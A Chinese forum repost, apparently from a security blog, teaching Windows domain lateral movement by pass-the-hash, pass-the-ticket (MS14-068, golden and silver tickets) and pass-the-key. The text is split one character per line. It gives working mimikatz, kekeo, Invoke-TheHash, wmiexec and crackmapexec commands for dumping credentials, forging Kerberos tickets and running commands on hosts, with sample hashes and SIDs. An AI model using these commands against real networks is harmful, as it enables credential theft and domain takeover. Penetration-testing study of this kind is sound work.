论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[21191] 2020-08-12_内网渗透之PTH&PTT&PTK
文档创建者:
s7ckTeam
浏览次数:
1
最后更新:
2025-01-18
渗透测试
1 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2020-08-12_内网渗透之PTH&PTT&PTK
内
网
渗
透
之
P
T
H
&
P
T
T
&
P
T
K
L
e
m
o
n
S
e
c
2
0
2
0
-
0
8
-
1
2
本
文
作
者
:
b
m
j
o
k
e
r
1
.
0
P
T
H
(
(
p
a
s
s
-
t
h
e
-
h
a
s
h
)
)
p
a
s
s
-
t
h
e
-
h
a
s
h
在
内
网
渗
透
中
是
一
种
很
经
典
的
攻
击
方
式
,
原
理
就
是
攻
击
者
可
以
直
接
通
过
L
M
H
a
s
h
和
N
T
L
M
H
a
s
h
访
问
远
程
主
机
或
服
务
,
而
不
用
提
供
明
文
密
码
。
p
a
s
s
t
h
e
h
a
s
h
原
理
:
在
W
i
n
d
o
w
s
系
统
中
,
通
常
会
使
用
N
T
L
M
身
份
认
证
N
T
L
M
认
证
不
使
用
明
文
口
令
,
而
是
使
用
口
令
加
密
后
的
h
a
s
h
值
,
h
a
s
h
值
由
系
统
A
P
I
生
成
(
例
如
L
s
a
L
o
g
o
n
U
s
e
r
)
h
a
s
h
分
为
L
M
h
a
s
h
和
N
T
h
a
s
h
,
如
果
密
码
长
度
大
于
1
5
,
那
么
无
法
生
成
L
M
h
a
s
h
。
从
W
i
n
d
o
w
s
V
i
s
t
a
和
W
i
n
d
o
w
s
S
e
r
v
e
r
2
0
0
8
开
始
,
微
软
默
认
禁
用
L
M
h
a
s
h
如
果
攻
击
者
获
得
了
h
a
s
h
,
就
能
够
在
身
份
验
证
的
时
候
模
拟
该
用
户
(
即
跳
过
调
用
A
P
I
生
成
h
a
s
h
的
过
程
)
这
类
攻
击
适
用
于
:
域
/
工
作
组
环
境
可
以
获
得
h
a
s
h
,
但
是
条
件
不
允
许
对
h
a
s
h
爆
破
内
网
中
存
在
和
当
前
机
器
相
同
的
密
码
微
软
也
对
p
t
h
打
过
补
丁
,
然
而
在
测
试
中
发
现
,
在
打
了
补
丁
后
,
常
规
的
P
a
s
s
T
h
e
H
a
s
h
已
经
无
法
成
功
,
唯
独
默
认
的
A
d
m
i
n
i
s
t
r
a
t
o
r
(
S
I
D
5
0
0
)
账
号
例
外
,
利
用
这
个
账
号
仍
可
以
进
行
P
a
s
s
T
h
e
H
a
s
h
远
程
i
p
c
连
接
。
如
果
禁
用
了
n
t
l
m
认
证
,
P
s
E
x
e
c
无
法
利
用
获
得
的
n
t
l
m
h
a
s
h
进
行
远
程
连
接
,
但
是
使
用
m
i
m
i
k
a
t
z
还
是
可
以
攻
击
成
功
。
从
w
i
n
d
o
w
s
到
w
i
n
d
o
w
s
横
向
p
t
h
这
一
类
攻
击
方
法
比
较
广
泛
1
.
1
M
i
m
i
k
a
t
z
m
i
m
i
k
a
t
z
的
p
t
h
功
能
需
要
本
地
管
理
员
权
限
,
这
是
由
它
的
实
现
机
制
决
定
的
,
需
要
先
获
得
高
权
限
进
程
l
s
a
s
s
.
e
x
e
的
信
息
对
于
8
.
1
/
2
0
1
2
r
2
,
安
装
补
丁
k
b
2
8
7
1
9
9
7
的
W
i
n
7
/
2
0
0
8
r
2
/
8
/
2
0
1
2
,
可
以
使
用
A
E
S
k
e
y
s
代
替
N
T
h
a
s
h
使
用
m
i
m
i
k
a
t
z
先
获
取
h
a
s
h
:
得
到
h
a
s
h
后
6
4
8
5
2
6
9
c
2
0
d
b
2
c
a
d
2
1
7
3
4
f
e
7
可
以
看
到
N
T
M
L
h
a
s
h
已
经
对
w
o
r
k
g
r
o
u
p
使
用
,
这
样
的
话
访
问
远
程
主
机
或
服
务
,
就
不
用
提
供
明
文
密
码
p
a
s
s
t
h
e
h
a
s
h
成
功
~
1
.
2
w
m
i
e
x
e
c
w
m
i
e
x
e
c
是
对
w
i
n
d
o
w
s
自
带
的
w
m
i
c
做
了
一
些
强
化
,
让
渗
透
变
得
更
容
易
。
只
能
说
很
多
工
具
吧
,
比
较
好
用
的
在
这
里
介
绍
两
种
:
第
一
种
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
K
e
v
i
n
-
R
o
b
e
r
t
s
o
n
/
I
n
v
o
k
e
-
T
h
e
H
a
s
h
p
r
i
v
i
l
e
g
e
:
:
d
e
b
u
g
s
e
k
u
r
l
s
a
:
:
l
o
g
o
n
p
a
s
s
w
o
r
d
s
s
e
k
u
r
l
s
a
:
:
p
t
h
/
u
s
e
r
:
a
d
m
i
n
i
s
t
r
a
t
o
r
/
d
o
m
a
i
n
:
w
o
r
k
g
r
o
u
p
/
n
t
l
m
:
c
c
e
f
2
0
8
c
6
4
8
5
2
6
9
c
2
0
d
b
2
c
a
d
2
1
7
3
4
f
e
7
w
i
n
d
o
w
s
管
理
规
范
[
W
M
I
]
”
,
实
际
上
就
是
w
i
n
d
o
w
s
从
0
3
/
x
p
开
始
就
一
直
内
置
的
一
个
系
统
插
件
,
其
设
计
初
衷
之
一
是
为
了
管
理
员
能
更
加
方
便
的
对
远
程
w
i
n
d
o
w
s
主
机
进
行
各
种
日
常
管
理
,
此
处
我
们
不
妨
先
来
简
单
来
试
着
想
一
下
,
对
w
i
n
d
o
w
s
的
远
程
管
理
到
底
意
味
着
什
么
,
没
错
,
它
意
味
着
我
们
可
以
直
接
在
本
地
操
作
远
程
目
标
机
器
上
的
进
程
,
服
务
,
注
册
表
等
其
它
的
一
系
列
的
特
权
操
作
,
严
格
来
说
它
其
实
是
为
各
种
服
务
提
供
一
个
统
一
的
调
用
接
口
而
设
计
的
,
比
如
,
你
想
操
作
什
么
服
务
就
去
调
用
对
应
的
服
务
类
中
的
方
法
去
执
行
你
的
操
作
就
行
,
不
过
,
单
对
于
内
网
横
向
移
动
来
讲
,
我
们
可
以
暂
时
先
不
用
把
它
理
解
的
非
常
细
致
,
毕
竟
不
是
在
专
门
做
针
对
性
的
防
御
产
品
,
也
正
是
由
于
此
功
效
,
在
正
常
的
管
理
员
的
眼
里
w
m
i
可
能
确
实
是
一
把
远
程
管
理
的
好
手
,
但
在
渗
透
者
眼
中
,
它
也
同
样
是
一
把
在
目
标
内
网
进
行
横
向
移
动
的
非
常
趁
手
的
武
器
其
他
攻
击
手
法
可
以
看
下
r
e
a
d
m
e
,
这
里
只
简
单
的
对
p
t
h
做
一
下
实
验
:
查
看
1
9
2
.
1
6
8
.
3
.
2
1
机
器
,
发
现
c
a
l
c
.
e
x
e
进
程
已
经
启
动
另
外
还
有
I
n
v
o
k
e
-
S
M
B
等
脚
本
都
可
以
进
行
利
用
,
利
用
方
法
也
差
不
多
一
样
:
I
n
v
o
k
e
-
S
M
B
E
x
e
c
支
持
S
M
B
1
,
S
M
B
2
(
2
.
1
)
,
a
n
d
S
M
B
s
i
g
n
i
n
g
通
过
在
目
标
主
机
创
建
服
务
执
行
命
令
,
所
以
权
限
为
s
y
s
t
e
m
I
n
v
o
k
e
-
S
M
B
C
l
i
e
n
t
支
持
S
M
B
1
,
S
M
B
2
(
2
.
1
)
,
a
n
d
S
M
B
s
i
g
n
i
n
g
,
如
果
只
有
S
M
B
文
件
共
享
的
权
限
,
没
有
远
程
执
行
权
限
,
可
以
使
用
该
脚
本
。
支
持
的
功
能
包
括
列
举
目
录
、
上
传
文
件
、
下
载
文
件
、
删
除
文
件
(
具
体
权
限
取
决
于
该
口
令
h
a
s
h
的
权
限
)
第
二
种
:
w
m
i
e
x
e
c
.
p
y
脚
本
地
址
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
C
o
r
e
S
e
c
u
r
i
t
y
/
i
m
p
a
c
k
e
t
/
b
l
o
b
/
m
a
s
t
e
r
/
e
x
a
m
p
l
e
s
/
w
m
i
e
x
e
c
.
p
y
w
m
i
e
x
e
c
.
e
x
e
通
过
p
y
t
h
o
n
i
m
p
a
c
k
e
t
库
实
现
的
,
生
成
的
e
x
e
有
点
大
,
5
M
大
小
在
实
战
起
来
有
点
不
方
便
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
m
a
a
a
a
z
/
i
m
p
a
c
k
e
t
-
e
x
a
m
p
l
e
s
-
w
i
n
d
o
w
s
w
m
i
e
x
e
c
.
p
y
的
注
释
中
提
示
"
M
a
i
n
a
d
v
a
n
t
a
g
e
h
e
r
e
i
s
i
t
r
u
n
s
u
n
d
e
r
t
h
e
u
s
e
r
(
h
a
s
t
o
b
e
A
d
m
i
n
)
a
c
c
o
u
n
t
"
,
经
实
际
测
试
普
通
用
户
权
限
即
可
参
数
实
例
:
w
m
i
e
x
e
c
.
p
y
的
h
a
s
h
参
数
格
式
为
L
M
H
a
s
h
:
N
T
H
a
s
h
,
由
于
该
H
a
s
h
来
自
于
S
e
r
v
e
r
2
0
0
8
,
系
统
默
认
不
支
持
L
M
h
a
s
h
,
所
以
L
M
h
a
s
h
可
以
设
定
为
任
意
值
1
.
3
C
r
a
c
k
M
a
p
E
x
e
c
C
r
a
c
k
M
a
p
E
x
e
c
可
以
对
C
段
中
的
主
机
进
行
批
量
p
t
h
,
项
目
地
址
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
b
y
t
3
b
l
3
3
d
3
r
/
C
r
a
c
k
M
a
p
E
x
e
c
.
g
i
t
使
用
命
令
:
对
1
9
2
.
1
6
8
.
3
.
0
/
2
4
C
段
进
行
批
量
p
a
s
s
t
h
e
h
a
s
h
2
.
0
P
T
T
(
(
p
a
s
s
t
h
e
t
i
c
k
e
t
)
)
p
t
t
攻
击
的
部
分
就
不
是
简
单
的
N
T
L
M
认
证
了
,
它
是
利
用
K
e
r
b
e
r
o
s
协
议
进
行
攻
击
的
,
这
里
就
介
绍
三
种
常
见
的
攻
击
方
法
:
M
S
1
6
-
0
6
8
,
G
o
l
d
e
n
t
i
c
k
e
t
,
S
I
L
V
E
R
t
i
c
k
e
t
。
之
前
介
绍
了
K
e
r
b
e
r
o
s
协
议
具
体
工
作
方
法
,
在
域
中
,
简
要
介
绍
一
下
:
客
户
机
将
明
文
密
码
进
行
N
T
L
M
哈
希
,
然
后
和
时
间
戳
一
起
加
密
(
使
用
k
r
b
t
g
t
密
码
h
a
s
h
作
为
密
钥
)
,
发
送
给
k
d
c
(
域
控
)
,
k
d
c
对
用
户
进
行
检
测
,
成
功
之
后
创
建
T
G
T
(
T
i
c
k
e
t
-
G
r
a
n
t
i
n
g
T
i
c
k
e
t
)
将
T
G
T
进
行
加
密
签
名
返
回
给
客
户
机
器
,
只
有
域
用
户
k
r
b
t
g
t
才
能
读
取
k
e
r
b
e
r
o
s
中
T
G
T
数
据
然
后
客
户
机
将
T
G
T
发
送
给
域
控
制
器
K
D
C
请
求
T
G
S
(
票
证
授
权
服
务
)
票
证
,
并
且
对
T
G
T
进
行
检
测
检
测
成
功
之
后
,
将
目
标
服
务
账
户
的
N
T
L
M
以
及
T
G
T
进
行
加
密
,
将
加
密
后
的
结
果
返
回
给
客
户
机
。
2
.
1
m
s
1
4
-
0
6
8
m
s
1
4
-
0
6
8
详
细
介
绍
:
h
t
t
p
s
:
/
/
w
w
w
.
f
r
e
e
b
u
f
.
c
o
m
/
v
u
l
s
/
5
6
0
8
1
.
h
t
m
l
简
单
来
说
就
是
:
造
成
的
危
害
是
允
许
域
内
任
何
一
个
普
通
用
户
,
将
自
己
提
升
至
域
管
权
限
。
微
软
给
出
的
补
丁
是
k
b
3
0
1
1
7
8
0
I
n
v
o
k
e
-
M
o
d
u
l
e
I
n
v
o
k
e
-
T
h
e
H
a
s
h
.
p
s
d
1
I
n
v
o
k
e
-
W
M
I
E
x
e
c
-
T
a
r
g
e
t
1
9
2
.
1
6
8
.
3
.
2
1
-
D
o
m
a
i
n
w
o
r
k
g
r
o
u
p
-
U
s
e
r
n
a
m
e
a
d
m
i
n
i
s
t
r
a
t
o
r
-
H
a
s
h
c
c
e
f
2
0
8
c
6
4
8
5
2
6
9
c
2
0
d
b
2
c
a
d
2
1
7
3
4
f
e
7
-
C
o
m
m
a
n
d
"
c
a
l
c
.
e
x
e
"
-
v
e
r
b
o
s
e
I
n
v
o
k
e
-
S
M
B
E
x
e
c
-
T
a
r
g
e
t
1
9
2
.
1
6
8
.
3
.
2
1
-
D
o
m
a
i
n
t
e
s
t
.
l
o
c
a
l
-
U
s
e
r
n
a
m
e
t
e
s
t
1
-
H
a
s
h
c
c
e
f
2
0
8
c
6
4
8
5
2
6
9
c
2
0
d
b
2
c
a
d
2
1
7
3
4
f
e
7
-
C
o
m
m
a
n
d
"
c
a
l
c
.
e
x
e
"
-
v
e
r
b
o
s
e
w
m
i
e
x
e
c
-
h
a
s
h
e
s
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
:
c
c
e
f
2
0
8
c
6
4
8
5
2
6
9
c
2
0
d
b
2
c
a
d
2
1
7
3
4
f
e
7
w
o
r
k
g
r
o
u
p
/
a
d
m
i
n
i
s
t
r
a
t
o
r
@
1
9
2
.
1
6
8
.
3
.
2
1
"
w
h
o
a
m
i
"
c
r
a
c
k
m
a
p
e
x
e
c
1
9
2
.
1
6
8
.
3
.
0
/
2
4
-
u
a
d
m
i
n
i
s
t
r
a
t
o
r
-
H
c
c
e
f
2
0
8
c
6
4
8
5
2
6
9
c
2
0
d
b
2
c
a
d
2
1
7
3
4
f
e
7
M
S
1
4
-
0
6
8
是
密
钥
分
发
中
心
(
K
D
C
)
服
务
中
的
W
i
n
d
o
w
s
漏
洞
。
它
允
许
经
过
身
份
验
证
的
用
户
在
其
K
e
r
b
e
r
o
s
票
证
(
T
G
T
)
中
插
入
任
意
P
A
C
(
表
示
所
有
用
户
权
限
的
结
构
)
。
该
漏
洞
位
于
k
d
c
s
v
c
.
d
l
l
域
控
制
器
的
密
钥
分
发
中
心
(
K
D
C
)
中
。
用
户
可
以
通
过
呈
现
具
有
改
变
的
w
i
n
d
o
w
s
域
中
使
用
k
e
r
b
e
r
o
s
协
议
过
程
中
,
为
了
让
S
S
服
务
器
判
断
C
l
i
e
n
t
是
否
有
权
限
访
问
服
务
,
引
入
了
P
A
C
机
制
。
构
造
P
A
C
也
是
这
个
漏
洞
的
根
本
。
1
.
在
请
求
A
S
时
,
将
r
e
q
u
i
r
e
_
P
A
C
设
置
成
F
a
l
s
e
。
2
.
在
请
求
T
G
S
时
,
构
造
P
A
C
,
然
后
使
用
M
D
5
签
名
(
P
A
C
尾
部
的
签
名
算
法
可
以
任
意
指
定
)
,
P
A
C
并
没
有
放
在
T
G
T
中
发
送
,
而
是
在
请
求
包
的
其
他
位
置
(
但
是
还
是
可
以
解
析
)
。
3
.
T
G
S
_
R
E
P
返
回
的
不
是
会
话
密
钥
,
而
是
返
回
的
带
P
A
C
的
T
G
T
(
微
软
的
锅
)
下
面
来
介
绍
一
下
m
s
1
4
-
0
6
8
的
利
用
过
程
:
1
.
使
用
w
h
o
a
m
i
/
u
s
e
r
得
到
普
通
域
用
户
的
s
i
d
2
.
执
行
p
a
y
l
o
a
d
生
成
T
G
T
票
据
:
利
用
工
具
:
m
s
1
4
-
0
6
8
使
用
方
法
:
运
行
实
例
:
如
果
操
作
正
确
,
且
域
机
器
是
可
以
和
域
控
制
器
互
通
则
会
创
建
.
c
c
a
c
h
e
文
件
3
.
票
据
注
入
:
使
用
m
i
m
i
k
a
t
z
将
票
据
注
入
到
当
前
内
存
中
,
伪
造
凭
证
,
如
果
成
功
则
拥
有
域
管
理
权
限
,
可
任
意
访
问
域
中
所
有
机
器
显
示
I
n
j
e
c
t
i
n
g
t
i
c
k
e
t
:
O
K
就
表
示
注
入
成
功
了
~
4
.
查
看
注
入
是
否
成
功
并
且
登
录
域
控
:
查
看
k
l
i
s
t
:
发
现
已
经
将
凭
证
注
入
进
去
了
~
下
面
可
以
使
用
n
e
t
u
s
e
进
行
登
录
,
或
者
使
用
p
s
e
x
e
c
,
w
m
i
等
方
法
进
行
远
程
执
行
命
令
。
注
意
,
这
里
登
录
时
,
要
使
用
机
器
名
,
不
要
使
用
I
P
,
否
则
没
办
法
攻
击
成
功
。
可
以
看
到
我
们
已
经
提
升
到
域
控
权
限
。
考
虑
到
m
i
m
i
k
a
t
z
的
p
t
h
功
能
需
要
本
地
管
理
员
权
限
,
所
以
m
i
m
i
k
a
t
z
也
提
供
了
不
需
要
管
理
员
权
限
的
解
决
方
法
P
a
s
s
-
T
h
e
-
T
i
c
k
e
t
P
a
s
s
-
T
h
e
-
T
i
c
k
e
t
需
要
用
到
g
e
n
t
i
l
k
i
w
i
开
源
的
另
一
款
工
具
k
e
k
e
o
,
下
载
地
址
:
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
g
e
n
t
i
l
k
i
w
i
/
k
e
k
e
o
/
r
e
l
e
a
s
e
s
m
s
1
4
-
0
6
8
.
e
x
e
-
u
域
成
员
名
@
域
名
-
s
域
成
员
s
i
d
-
d
域
控
制
器
地
址
-
p
域
成
员
密
码
M
S
1
4
-
0
6
8
.
e
x
e
-
u
m
a
r
y
@
g
o
d
.
o
r
g
-
s
S
-
1
-
5
-
2
1
-
1
2
1
8
9
0
2
3
3
1
-
2
1
5
7
3
4
6
1
6
1
-
1
7
8
2
2
3
2
7
7
8
-
1
1
2
4
-
d
1
9
2
.
1
6
8
.
3
.
2
1
-
p
a
d
m
i
n
!
@
#
4
5
m
i
m
i
k
a
t
z
#
k
e
r
b
e
r
o
s
:
:
p
u
r
g
e
/
/
清
空
当
前
机
器
中
所
有
凭
证
,
如
果
有
域
成
员
凭
证
会
影
响
凭
证
伪
造
m
i
m
i
k
a
t
z
#
k
e
r
b
e
r
o
s
:
:
l
i
s
t
/
/
查
看
当
前
机
器
凭
证
m
i
m
i
k
a
t
z
#
k
e
r
b
e
r
o
s
:
:
p
t
c
票
据
文
件
/
/
将
票
据
注
入
到
内
存
中
k
e
k
e
o
"
t
g
t
:
:
a
s
k
/
u
s
e
r
:
m
a
r
y
/
d
o
m
a
i
n
:
g
o
d
.
o
r
g
/
n
t
l
m
:
5
1
8
b
9
8
a
d
4
1
7
8
a
5
3
6
9
5
d
c
9
9
7
a
a
0
2
d
4
5
5
c
"
执
行
后
生
成
票
据
接
下
来
导
入
票
据
:
成
功
获
得
了
域
控
的
访
问
权
限
:
2
.
2
G
o
l
d
e
n
t
i
c
k
e
t
(
黄
金
票
据
)
(
黄
金
票
据
)
G
o
l
d
e
n
t
i
c
k
e
t
的
作
用
是
可
以
生
成
任
意
用
户
的
t
g
t
,
那
么
问
题
就
来
了
,
是
什
么
条
件
能
够
让
他
生
成
任
意
用
户
的
t
g
t
呢
?
还
得
要
看
k
e
r
b
e
r
o
s
认
证
的
过
程
,
在
w
i
n
d
o
w
s
认
证
过
程
中
,
客
户
端
将
自
己
的
信
息
发
送
给
K
D
C
,
然
后
K
D
C
使
用
k
r
b
t
g
t
用
户
密
码
的
h
a
s
h
作
为
密
钥
进
行
加
密
,
生
成
T
G
T
。
那
么
如
果
获
取
到
了
k
r
b
t
g
t
的
密
码
h
a
s
h
值
,
是
不
是
就
可
以
伪
造
任
意
t
g
t
了
。
因
为
因
为
k
r
b
t
g
t
只
有
域
控
制
器
上
面
才
有
,
所
以
使
用
黄
金
凭
据
意
味
着
你
之
前
拿
到
过
域
控
制
器
的
权
限
只
有
域
控
制
器
上
面
才
有
,
所
以
使
用
黄
金
凭
据
意
味
着
你
之
前
拿
到
过
域
控
制
器
的
权
限
,
黄
金
凭
据
可
以
理
解
为
一
个
后
门
黄
金
凭
据
可
以
理
解
为
一
个
后
门
伪
造
黄
金
凭
据
需
要
具
备
下
面
条
件
:
伪
造
黄
金
凭
据
需
要
具
备
下
面
条
件
:
k
r
b
t
g
t
用
户
的
h
a
s
h
(
就
意
味
着
你
已
经
有
域
控
制
器
权
限
了
)
域
名
称
域
的
S
I
D
值
要
伪
造
的
用
户
名
先
登
录
域
控
制
器
,
d
u
m
p
k
r
b
t
g
t
用
户
的
h
a
s
h
值
,
获
取
域
s
i
d
:
切
换
到
普
通
域
用
户
的
机
器
,
生
成
T
G
T
凭
证
,
用
户
名
为
a
d
m
i
n
i
s
t
r
a
t
o
r
:
然
后
使
用
m
i
m
i
k
a
t
z
将
凭
证
注
入
进
去
,
攻
击
成
功
:
如
果
主
机
开
启
了
R
P
C
服
务
,
还
可
以
使
用
W
m
i
E
x
e
c
.
v
b
s
直
接
连
接
:
:
T
G
T
_
m
a
r
y
@
G
O
D
.
O
R
G
_
k
r
b
t
g
t
~
g
o
d
.
o
r
g
@
G
O
D
.
O
R
G
.
k
i
r
b
i
k
e
k
e
o
"
k
e
r
b
e
r
o
s
:
:
p
t
t
T
G
T
_
m
a
r
y
@
G
O
D
.
O
R
G
_
k
r
b
t
g
t
~
g
o
d
.
o
r
g
@
G
O
D
.
O
R
G
.
k
i
r
b
i
"
p
r
i
v
i
l
e
g
e
:
:
d
e
b
u
g
l
s
a
d
u
m
p
:
:
l
s
a
/
p
a
t
c
h
m
i
m
i
k
a
t
z
#
k
e
r
b
e
r
o
s
:
:
p
t
t
t
e
s
t
.
k
i
r
b
i
2
.
3
s
i
l
v
e
r
t
i
c
k
e
t
(
白
银
票
据
)
(
白
银
票
据
)
s
i
l
v
e
r
t
i
c
k
e
t
和
g
o
l
d
e
n
t
i
c
k
e
t
不
同
的
是
,
它
不
需
要
和
域
控
制
器
进
行
通
信
,
原
理
是
伪
造
T
G
S
,
使
用
的
是
计
算
机
账
户
的
h
a
s
h
进
行
加
密
的
,
所
以
只
能
访
问
指
定
的
权
限
。
不
像
是
G
o
l
d
e
n
t
i
c
k
e
t
,
是
由
k
r
g
t
g
t
用
户
的
密
码
h
a
s
h
进
行
加
密
,
伪
造
t
g
t
可
以
获
取
到
所
有
权
限
。
白
银
票
据
这
里
只
是
对
单
一
的
服
务
进
行
授
权
,
利
用
过
程
和
g
o
l
d
e
n
t
i
c
k
e
t
差
不
多
,
首
先
上
域
控
制
器
中
,
把
机
器
的
n
t
l
m
h
a
s
h
(
r
c
4
加
密
)
d
u
m
p
下
来
,
然
后
在
普
通
域
用
户
机
器
进
行
伪
造
权
限
,
进
行
p
t
t
.
1
.
首
先
登
录
域
控
,
d
u
m
p
机
器
h
a
s
h
2
.
将
h
a
s
h
保
存
下
来
,
在
普
通
域
用
户
机
器
中
进
行
p
t
t
这
里
的
c
i
f
s
是
指
的
文
件
共
享
服
务
,
有
了
c
i
f
s
服
务
权
限
,
就
可
以
访
问
域
控
制
器
的
文
件
系
统
:
3
.
0
P
T
K
(
(
p
a
s
s
t
h
e
k
e
y
)
)
还
是
使
用
的
m
i
m
i
k
a
t
z
工
具
,
不
过
需
免
杀
。
获
取
用
户
的
a
e
s
k
e
y
:
注
入
a
e
s
k
e
y
:
p
r
i
v
i
l
e
g
e
:
:
d
e
b
u
g
s
e
k
u
r
l
s
a
:
:
l
o
g
o
n
p
a
s
s
w
o
r
d
s
k
e
r
b
e
r
o
s
:
:
g
o
l
d
e
n
/
d
o
m
a
i
n
:
g
o
d
.
o
r
g
/
s
i
d
:
S
-
1
-
5
-
2
1
-
1
2
1
8
9
0
2
3
3
1
-
2
1
5
7
3
4
6
1
6
1
-
1
7
8
2
2
3
2
7
7
8
/
t
a
r
g
e
t
:
1
9
2
.
1
6
8
.
3
.
2
1
/
r
c
4
:
8
4
3
2
d
4
f
a
4
4
3
0
e
c
f
5
6
9
2
7
d
b
a
b
d
1
b
4
d
3
6
b
/
s
e
r
v
i
c
e
:
c
i
f
s
/
u
s
e
r
:
m
a
r
y
/
p
t
t
m
i
m
i
k
a
t
z
"
p
r
i
v
i
l
e
g
e
:
:
d
e
b
u
g
"
"
s
e
k
u
r
l
s
a
:
:
e
k
e
y
s
"
m
i
m
i
k
a
t
z
"
p
r
i
v
i
l
e
g
e
:
:
d
e
b
u
g
"
"
s
e
k
u
r
l
s
a
:
:
p
t
h
/
u
s
e
r
:
m
a
r
y
/
d
o
m
a
i
n
:
g
o
d
.
o
r
g
/
a
e
s
2
5
6
:
c
4
3
8
8
a
1
f
b
9
b
d
6
5
a
8
8
3
4
3
a
3
2
c
0
9
e
5
3
b
a
6
c
1
e
a
d
4
d
e
8
a
1
7
a
4
4
2
e
8
1
9
e
9
8
c
5
2
2
f
c
2
8
8
"
成
功
注
入
a
e
s
2
5
6
,
尝
试
远
程
连
接
:
如
果
拒
绝
访
问
的
话
尝
试
安
装
如
果
觉
得
文
章
对
你
有
帮
助
,
请
支
持
下
点
击
右
下
角
“
在
看
”
k
b
2
8
7
1
9
9
7
补
丁
参
考
链
接
:
h
t
t
p
s
:
/
/
w
w
w
.
a
n
q
u
a
n
k
e
.
c
o
m
/
p
o
s
t
/
i
d
/
1
5
9
9
5
9
h
t
t
p
s
:
/
/
k
l
i
o
n
s
e
c
.
g
i
t
h
u
b
.
i
o
/
2
0
1
6
/
0
8
/
1
0
/
n
t
l
m
-
k
e
r
b
e
r
o
s
/
h
t
t
p
s
:
/
/
m
p
.
w
e
i
x
i
n
.
q
q
.
c
o
m
/
s
/
7
Y
i
d
k
h
J
v
m
V
B
x
F
h
Y
c
D
7
p
I
f
Q
h
t
t
p
s
:
/
/
3
g
s
t
u
d
e
n
t
.
g
i
t
h
u
b
.
i
o
/
3
g
s
t
u
d
e
n
t
.
g
i
t
h
u
b
.
i
o
/
%
E
5
%
9
F
%
9
F
%
E
6
%
B
8
%
9
7
%
E
9
%
8
0
%
8
F
-
P
a
s
s
-
T
h
e
-
H
a
s
h
%
E
7
%
9
A
%
8
4
%
E
5
%
A
E
%
9
E
%
E
7
%
8
E
%
B
0
/
h
t
t
p
s
:
/
/
a
d
s
e
c
u
r
i
t
y
.
o
r
g
/
?
p
=
1
5
1
5
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
g
e
n
t
i
l
k
i
w
i
/
k
e
k
e
o
/
w
i
k
i
/
m
s
1
4
0
6
8
h
t
t
p
:
/
/
w
o
o
y
u
n
.
j
o
z
x
i
n
g
.
c
c
/
s
t
a
t
i
c
/
d
r
o
p
s
/
t
i
p
s
-
1
2
1
5
9
.
h
t
m
l
h
t
t
p
:
/
/
w
w
w
.
f
r
e
e
b
u
f
.
c
o
m
/
v
u
l
s
/
5
6
0
8
1
.
h
t
m
l
h
t
t
p
:
/
/
b
l
o
g
.
5
1
c
t
o
.
c
o
m
/
z
2
p
p
p
/
2
0
6
0
6
9
5
原
文
链
接
:
h
t
t
p
s
:
/
/
w
w
w
.
c
n
b
l
o
g
s
.
c
o
m
/
b
m
j
o
k
e
r
/
p
/
1
0
3
5
5
9
7
9
.
h
t
m
l
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试